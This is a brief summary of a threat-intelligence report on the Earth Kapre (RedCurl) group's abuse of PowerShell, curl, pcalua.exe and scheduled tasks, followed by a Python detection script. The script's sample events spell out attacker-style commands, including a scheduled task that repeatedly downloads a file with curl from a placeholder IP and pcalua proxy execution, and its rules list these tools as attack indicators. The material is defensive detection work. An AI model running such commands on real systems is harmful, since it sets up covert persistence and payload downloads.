Unveiling Earth Kapre aka RedCurl’s Cyberespionage Tactics With Trend Micro MDR, Threat Intelligence
released on 2024-03-11 @ 10:52:09 AM
This report examines an investigation by the Trend Micro MDR team that uncovered the intrusion tactics used by the threat actor group Earth Kapre (also tracked as RedCurl) in a recent incident. The investigation found Earth Kapre abusing legitimate, already-present tools such as PowerShell, curl, and pcalua.exe to evade detection while compromising systems. The threat actor established persistence via scheduled tasks and used Python scripts and Impacket for command execution. Threat intelligence analysis attributed the attack to Earth Kapre based on infrastructure links and code similarities with known samples.
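The living-off-the-land pattern summarised above (pcalua.exe as a proxy launcher, scheduled tasks that invoke PowerShell or curl, curl downloads spawned by the task scheduler) can be turned into simple process-creation detections. The following is an added illustration, not code or telemetry from the Trend Micro report; the Sysmon-style field names are assumed and the sample events, paths and address are constructed.

```python
import re
from typing import Callable, Dict, List, Tuple

# Constructed process-creation events (Sysmon Event ID 1 style fields). These are
# invented for the example and are not indicators from the investigation.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"Image": r"C:\Windows\System32\pcalua.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"pcalua.exe -a C:\Users\Public\update.exe"},
    {"Image": r"C:\Windows\System32\schtasks.exe",
     "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r'schtasks /create /tn "Updater" /tr "curl.exe -o C:\Users\Public\u.dat http://203.0.113.5/u" /sc minute /mo 30'},
    {"Image": r"C:\Windows\System32\curl.exe",
     "ParentImage": r"C:\Windows\System32\svchost.exe",  # Schedule service host
     "CommandLine": r"curl.exe -o C:\Users\Public\u.dat http://203.0.113.5/u"},
    {"Image": r"C:\Windows\System32\notepad.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "notepad.exe readme.txt"},
]

def _f(ev: Dict[str, str], key: str) -> str:
    """Case-folded field access; missing fields compare as empty strings."""
    return ev.get(key, "").lower()

# Each rule is (name, predicate). Plain functions keep the logic readable and
# easy to port to a SIEM query language.
RULES: List[Tuple[str, Callable[[Dict[str, str]], bool]]] = [
    # Program Compatibility Assistant used to launch an arbitrary binary.
    ("pcalua_proxy_execution",
     lambda ev: _f(ev, "Image").endswith("pcalua.exe") and " -a " in _f(ev, "CommandLine")),
    # Scheduled task created whose action runs PowerShell or curl.
    ("schtasks_lolbin_persistence",
     lambda ev: _f(ev, "Image").endswith("schtasks.exe") and "/create" in _f(ev, "CommandLine")
     and re.search(r"powershell|curl", _f(ev, "CommandLine")) is not None),
    # curl writing a file to disk while parented by the task scheduler's svchost.
    ("curl_download_from_scheduler",
     lambda ev: _f(ev, "Image").endswith("curl.exe") and _f(ev, "ParentImage").endswith("svchost.exe")
     and re.search(r"\s-o\s", _f(ev, "CommandLine")) is not None),
]

def detect(events: List[Dict[str, str]]) -> List[Tuple[str, str]]:
    """Return (rule_name, CommandLine) for every event matching at least one rule."""
    return [(name, ev["CommandLine"]) for ev in events for name, pred in RULES if pred(ev)]

if __name__ == "__main__":
    for name, cmd in detect(SAMPLE_EVENTS):
        print(f"[{name}] {cmd}")
```

Tune the curl rule to your environment: legitimate tasks also run curl, so the parent-process and output-path conditions are where false positives are controlled.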